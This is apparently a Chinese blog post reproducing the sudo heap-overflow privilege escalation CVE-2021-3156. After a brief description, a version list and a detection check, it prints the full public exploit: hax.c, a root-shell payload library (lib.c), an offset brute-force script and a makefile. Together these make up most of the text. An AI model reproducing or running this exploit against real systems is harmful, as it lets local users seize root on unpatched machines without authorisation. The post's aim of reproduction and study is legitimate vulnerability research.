linux堆溢出sudo提权复现

linux堆溢出sudo提权复现

漏洞简介

当sudo通过-s或-i命令行选项在shell模式下运行命令时，它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时，实际上并未进行转义，从而可能导致缓冲区溢出。只要存在sudoers文件（通常是 /etc/sudoers），攻击者就可以使用本地普通用户利用sudo获得系统root权限。

影响版本

• Sudo 1.8.2 - 1.8.31p2

• Sudo 1.9.0 - 1.9.5p1

不受影响版本

• Sudo =>1.9.5p2

漏洞检测

• sudo -V

• sudoedit -s /

  • 返回以sudoedit·:开头的错误，则可能存在漏洞
  • 返回以usage:开头的错误响应，则无影响

• 或者我的kali，什么也没返回让输入密码，所以还是看版本把

漏洞复现

exp下载

• cd CVE-2021-3156

• make

• ./sudo-hax-me-a-sandwich 1

代码贴一下

hax.c

/**
 ** CVE-2021-3156 PoC by blasty <peter@haxx.in>
 ** ===========================================
 **
 ** Exploit for that sudo heap overflow thing everyone is talking about.
 ** This one aims for singleshot. Does not fuck with your system files.
 ** No warranties.
 **
 ** Shout outs to:
 **   Qualys      - for pumping out the awesome bugs
 **   lockedbyte  - for coop hax. (shared tmux gdb sessions ftw)
 **   dsc         - for letting me rack up his electricity bill
 **   my wife     - for all the quality time we had to skip
 **
 **  Enjoy!
 **
 **   -- blasty // 20210130
 **/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

// 512 environment variables should be enough for everyone
#define MAX_ENVP 512
#define SUDOEDIT_PATH "/usr/bin/sudoedit"

typedef struct {
	char *target_name;
	char *sudoedit_path;
	uint32_t smash_len_a;
	uint32_t smash_len_b;
	uint32_t null_stomp_len;
	uint32_t lc_all_len; 
} target_t;

target_t targets[] = {
    {
        // Yes, same values as 20.04.1, but also confirmed.
        .target_name    = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27",
        .sudoedit_path  = SUDOEDIT_PATH,
        .smash_len_a    = 56,
        .smash_len_b    = 54,
        .null_stomp_len = 63, 
        .lc_all_len     = 212
    },
    {
        .target_name    = "Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31",
        .sudoedit_path  = SUDOEDIT_PATH,
        .smash_len_a    = 56,
        .smash_len_b    = 54,
        .null_stomp_len = 63, 
        .lc_all_len     = 212
    },
    {
        .target_name    = "Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28",
        .sudoedit_path  = SUDOEDIT_PATH,
        .smash_len_a    = 64,
        .smash_len_b    = 49,
        .null_stomp_len = 60, 
        .lc_all_len     = 214
    }
};

void usage(char *prog) {
    fprintf(stdout,
        "  usage: %s <target>\n\n"
        "  available targets:\n"
        "  ------------------------------------------------------------\n",
        prog
    );
    for(int i = 0; i < sizeof(targets) / sizeof(target_t); i++) {
        printf("    %d) %s\n", i, targets[i].target_name);
    }
    fprintf(stdout,
        "  ------------------------------------------------------------\n"
        "\n"
        "  manual mode:\n"
        "    %s <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>\n"
        "\n",
        prog
    );
}

int main(int argc, char *argv[]) {
    printf("\n** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n\n");

    if (argc != 2 && argc != 5) {
        usage(argv[0]);
        return -1;
    }

    target_t *target = NULL;
    if (argc == 2) {
        int target_idx = atoi(argv[1]);

        if (target_idx < 0 || target_idx >= (sizeof(targets) / sizeof(target_t))) {
            fprintf(stderr, "invalid target index\n");
            return -1;
        }

        target = &targets[ target_idx ];
    }  else {
        target = malloc(sizeof(target_t));
        target->target_name    = "Manual";
        target->sudoedit_path  = SUDOEDIT_PATH;
        target->smash_len_a    = atoi(argv[1]);
        target->smash_len_b    = atoi(argv[2]);
        target->null_stomp_len = atoi(argv[3]);
        target->lc_all_len     = atoi(argv[4]);
    }

    printf(
        "using target: %s ['%s'] (%d, %d, %d, %d)\n", 
        target->target_name,
        target->sudoedit_path,
        target->smash_len_a,
        target->smash_len_b,
        target->null_stomp_len,
        target->lc_all_len
    );

    char *smash_a = calloc(target->smash_len_a + 2, 1);
    char *smash_b = calloc(target->smash_len_b + 2, 1);

    memset(smash_a, 'A', target->smash_len_a);
    memset(smash_b, 'B', target->smash_len_b);

    smash_a[target->smash_len_a] = '\\';
    smash_b[target->smash_len_b] = '\\';

    char *s_argv[]={
        "sudoedit", "-s", smash_a, "\\", smash_b, NULL
    };

    char *s_envp[MAX_ENVP];
    int envp_pos = 0;

    for(int i = 0; i < target->null_stomp_len; i++) {
        s_envp[envp_pos++] = "\\";
    }
    s_envp[envp_pos++] = "X/P0P_SH3LLZ_";

    char *lc_all = calloc(target->lc_all_len + 16, 1);
    strcpy(lc_all, "LC_ALL=C.UTF-8@");
    memset(lc_all+15, 'C', target->lc_all_len);

    s_envp[envp_pos++] = lc_all;
    s_envp[envp_pos++] = NULL;

    printf("** pray for your rootshell.. **\n");

    execve(target->sudoedit_path, s_argv, s_envp);
    return 0;
}

lib.c

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
static void __attribute__ ((constructor)) _init(void);
 
static void _init(void) {
	printf("[+] bl1ng bl1ng! We got it!\n");
#ifndef BRUTE
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	execv("/bin/sh", a_argv);
#endif
}

brute.sh

#!/bin/bash

try_brute() {
    IDX=`echo "$1" | awk -F ':' '{ print $1 }'`
    ALEN=`echo "$1" | awk -F ':' '{ print $2 }'`
    BLEN=`echo "$1" | awk -F ':' '{ print $3 }'`
    NLEN=`echo "$1" | awk -F ':' '{ print $4 }'`
    LCLEN=`echo "$1" | awk -F ':' '{ print $5 }'`
    OFN=out/`printf "%08d" $IDX`.txt

    (
        timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1
    ) > $OFN

    R="`grep -B999 bl1ng $OFN`"

    if [ "$R" == "" ]; then
        echo "NOPE"
    else
        echo "==================" >> success.txt
        grep -B999 bl1ng $OFN >> success.txt
    fi

    rm -f "${OFN}"
}

if [ "$#" == "1" ]; then
    N=`echo "$1" | awk -F ':' '{ print NF }'`
    if [ "$N" == 5 ]; then
        try_brute "$1"
        exit 0
    fi
fi

if [ "$#" != "6" ]; then
    echo "usage: $0 <smash_min> <smash_max> <null_min> <null_max> <lc_min> <lc_max>"
    exit 0
fi

if ! [ -x "$(command -v parallel)" ]; then
    echo "error: gnu parallel not found"
    exit 1
fi

smash_min=$1
smash_max=$2
null_min=$3
null_max=$4
lc_min=$5
lc_max=$6

echo "[+] cleaning up.."
rm -rf possib
rm -rf success.txt
touch success.txt
mkdir out 2>/dev/null
# people are likely to forget this
make brute 2>/dev/null

# generate permutations
echo "[+] generating possibilities.."
i=0
for smash_len in `seq $smash_min $smash_max`; do
for null_stomp_len in `seq $null_min $null_max`; do
for lc_all_len in `seq $lc_min 10 $lc_max`; do
    if [ "$[$smash_len % 2]" == "1" ]; then
        alen=$[($smash_len-1)/2]
        blen=$[$alen + 1]
    else
        alen=$[$smash_len/2]
        blen=$alen
    fi

    echo "$i:${alen}:${blen}:${null_stomp_len}:${lc_all_len}" >> possib
    i=$[$i+1]
done
done
done

# start bruting
echo "[+] lets go.."
parallel -j +`nproc` --eta $0 < possib

echo "[+] done"
if [ "`cat success.txt|wc -l`" == "0" ]; then
    echo "[-] we didnt find any working candidates :("
else
    echo "[+] we found some goodies (saved in success.txt):"
    cat success.txt
fi

makefile

all:
	rm -rf libnss_X
	mkdir libnss_X
	gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
	gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
brute: all
	gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
clean:
	rm -rf libnss_X sudo-hax-me-a-sandwich

end

总感觉sudo贸易变了，

我在root下，切换了用户执行了之后